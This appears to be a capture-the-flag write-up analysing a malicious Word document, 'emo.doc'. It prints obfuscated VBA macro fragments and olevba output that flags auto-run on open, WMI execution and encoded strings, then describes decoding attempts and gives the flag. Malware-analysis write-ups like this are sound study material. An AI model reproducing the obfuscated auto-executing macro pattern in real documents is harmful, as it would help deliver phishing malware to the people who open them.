ojnIHCE(JoDasPDE) = (Sin(8) + 6 + 40)
IwHWCHJLB = sqHqe
ojnIHCE(JoDasPDE + JoDasPDE) = (JdtFGmA + 5)
ojnIHCE(JoDasPDE + JoDasPDE) = 2 + Oct(7819) + Rwbej + CDbl(9) + (4 + YBDhHCIR + FMTZFCBH + Cos(2894))
Set Y5ruq1pwxek1348fi = CreateObject(Hy5393z_cu1)
   Dim XayLAAE(6 + 7 + 1 + 7) As String
Set hBkDI = (kuHYCInr)
Dim GUdOBwJFg(6 + 8 + 1 + 4) As String
XayLAAE(DFPEBfGJ) = (Sin(8) + 632 + 555)
MOOXq = yIMQNHJJ
XayLAAE(DFPEBfGJ + DFPEBfGJ) = (QRuDtDeBh + 8952)
XayLAAE(DFPEBfGJ + DFPEBfGJ) = 6 + Oct(4) + ydSHHJF + CDbl(464) + (6107 + jBTBKJJ + gFSXE + Cos(4815))
Dim cREZHj(6 + 7 + 1 + 5) As String
Set fCASJI = (sNHBGJB)
Dim ohlbI(5 + 5 + 1 + 7) As String
cREZHj(EPsmDJFHe) = (Sin(740) + 13 + 3027)
QZkhqLi = bYDhRDF
cREZHj(EPsmDJFHe + EPsmDJFHe) = (NgGemeSEB + 3)
cREZHj(EPsmDJFHe + EPsmDJFHe) = 2011 + Oct(8) + TddiLDt + CDbl(423) + (3 + DajuFERHE + WvQuFBA + Cos(23))
End Function
-------------------------------------------------------------------------------
VBA FORM STRING IN 'emo.doc' - OLE stream: 'Macros/Get4ipjzmjfvp/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
][(s)]wP][(s)]w
-------------------------------------------------------------------------------
VBA FORM STRING IN 'emo.doc' - OLE stream: 'Macros/Get4ipjzmjfvp/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
][(s)]wtar][(s)]w
-------------------------------------------------------------------------------
VBA FORM STRING IN 'emo.doc' - OLE stream: 'Macros/Get4ipjzmjfvp/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
][(s)]wtu][(s)]w
-------------------------------------------------------------------------------
VBA FORM Variable "b'Fwder3b7t4tqrecw'" IN 'emo.doc' - OLE stream: 'Macros/Get4ipjzmjfvp'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
b'][(s)]wP][(s)]w'
-------------------------------------------------------------------------------
VBA FORM Variable "b'Mvskm12if9c843w3'" IN 'emo.doc' - OLE stream: 'Macros/Get4ipjzmjfvp'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
b'][(s)]wtar][(s)]w'
-------------------------------------------------------------------------------
VBA FORM Variable "b'Cn8r2cg8i626ztt'" IN 'emo.doc' - OLE stream: 'Macros/Get4ipjzmjfvp'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
b'][(s)]wtu][(s)]w'
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |Document_open       |Runs when the Word or Publisher document is  |
|          |                    |opened                                       |
|Suspicious|Create              |May execute file or a system command through |
|          |                    |WMI                                          |
|Suspicious|CreateObject        |May create an OLE object                     |
|Suspicious|ChrW                |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
+----------+--------------------+---------------------------------------------+

oleid showed that document has VBA Macros, which is suspicious and could be dangerous.

olevba dumped huge obfuscated script which means the script is 110% malicious...

Extract the VBA scripts as one file:

Manual analysis was too complicated, so then I found ViperMonkeyarrow-up-right while watching the Malware Analysis - Malicious VBAarrow-up-right

The given Base64 blobs didn't evaluate to anything...

Another approach would be to perform dynamic analysis with debugger, or submit the document on https://app.any.runarrow-up-right

https://app.any.run/tasks/564c32f0-1823-4a3c-bc85-0a6225ff789earrow-up-right

emo.png

CyberChef > Base64 > Decode Text: UTF-16LEarrow-up-right

The XOR seems to depend on URL, but using them yielded no readable text. What if the bytes themselves are encoded with XOR?

circle-check

Flag: HTB{4n0th3R_d4Y_AnoThEr_pH1Sh}

PreviousTrueSecretsNextHardware

Last updated